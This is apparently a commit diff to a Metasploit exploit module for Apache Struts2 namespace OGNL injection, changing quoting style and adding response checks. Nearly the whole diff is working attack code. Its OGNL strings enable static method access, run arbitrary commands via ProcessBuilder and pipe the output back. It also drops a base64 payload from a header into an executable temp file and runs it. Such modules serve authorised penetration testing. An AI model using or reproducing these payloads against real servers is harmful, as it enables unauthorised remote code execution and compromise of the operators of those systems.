Quote-block cleanup and improved error handling

2018-09-07 11:43:04 -05:00 · 2018-09-07 11:43:04 -05:00 · 99ca6cef49
parent 3671f8f6b0
commit 99ca6cef49
1 changed files with 23 additions and 19 deletions
--- a/modules/exploits/multi/http/struts2_namespace_ognl.rb
+++ b/modules/exploits/multi/http/struts2_namespace_ognl.rb
@ -234,10 +234,10 @@ class MetasploitModule < Msf::Exploit::Remote
                   }

    ognl = ""
-    ognl << "(#_memberAccess['allowStaticMethodAccess']=true)." if datastore['ENABLE_STATIC']
-    ognl << "('#{rand_text_alpha(2)}')"
+    ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
+    ognl << %Q|('#{rand_text_alpha(2)}')|
    properties.each do |k,v|
-      ognl << "+(@java.lang.System@getProperty('#{k}'))+':'"
+      ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|
    end
    ognl = ognl[0...-4]

@ -298,8 +298,8 @@ class MetasploitModule < Msf::Exploit::Remote
      vprint_warning("Target profiling was unable to determine operating system")
      os = ''
      os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'
-      os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'
-      os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'
+      os = 'linux'   if datastore['PAYLOAD'].downcase.include? 'linux'
+      os = 'unix'    if datastore['PAYLOAD'].downcase.include? 'unix'
    end

    if (os.include? 'linux') || (os.include? 'nix')
@ -318,19 +318,19 @@ class MetasploitModule < Msf::Exploit::Remote
    vprint_status("Executing: #{cmd}")

    ognl =  ""
-    ognl << "(#_memberAccess['allowStaticMethodAccess']=true)." if datastore['ENABLE_STATIC']
-    ognl << "(#p=new java.lang.ProcessBuilder(#{cmd}))."
-    ognl << "(#p.redirectErrorStream(true))."
-    ognl << "(#process=#p.start())."
-    ognl << "(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
-    ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r))."
-    ognl << "(#r.flush())"
+    ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
+    ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|
+    ognl << %q|(#p.redirectErrorStream(true)).|
+    ognl << %q|(#process=#p.start()).|
+    ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).|
+    ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).|
+    ognl << %q|(#r.flush())|

    r = send_struts_request(ognl)

    if r && r.code == 200
      print_good("Command executed:\n#{r.body}")
-    else
+    elsif r
      if r.body.length == 0
        print_status("Payload sent, but no output provided from server.")
      elsif r.body.length > 0
@ -348,8 +348,8 @@ class MetasploitModule < Msf::Exploit::Remote
      vprint_warning("Target profiling was unable to determine operating system")
      os = ''
      os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'
-      os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'
-      os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'
+      os = 'linux'   if datastore['PAYLOAD'].downcase.include? 'linux'
+      os = 'unix'    if datastore['PAYLOAD'].downcase.include? 'unix'
    end

    data_header = datastore['HEADER']
@ -362,7 +362,8 @@ class MetasploitModule < Msf::Exploit::Remote
    # d = data stream from HTTP header
    # f = path to temp file
    # s = stream/handle to temp file
-    ognl  = "(#_memberAccess['allowStaticMethodAccess']=true)."
+    ognl  = ""
+    ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
    ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|
    ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','tmp')).|
    ognl << %q|(#f.setExecutable(true)).|
@ -376,16 +377,19 @@ class MetasploitModule < Msf::Exploit::Remote
    ognl << %q|(#f.delete()).|

    success_string = rand_text_alpha(4)
-    ognl << "('#{success_string}')"
+    ognl << %Q|('#{success_string}')|

    exe = [generate_payload_exe].pack("m").delete("\n")
    r = send_struts_request(ognl, payload: exe)

-    if r.headers['Location'].split('/')[1] == success_string
+    if r && r.headers && r.headers['Location'].split('/')[1] == success_string
      print_good("Payload successfully dropped and executed.")
-    else
+    elsif r && r.headers['Location']
      vprint_error("RESPONSE: " + r.headers['Location'])
      fail_with(Failure::PayloadFailed, "Target did not successfully execute the request")
+    elsif r && r.code == 400
+      fail_with(Failure::UnexpectedReply, "Target reported an unspecified error while executing the payload")
    end
  end
 end
+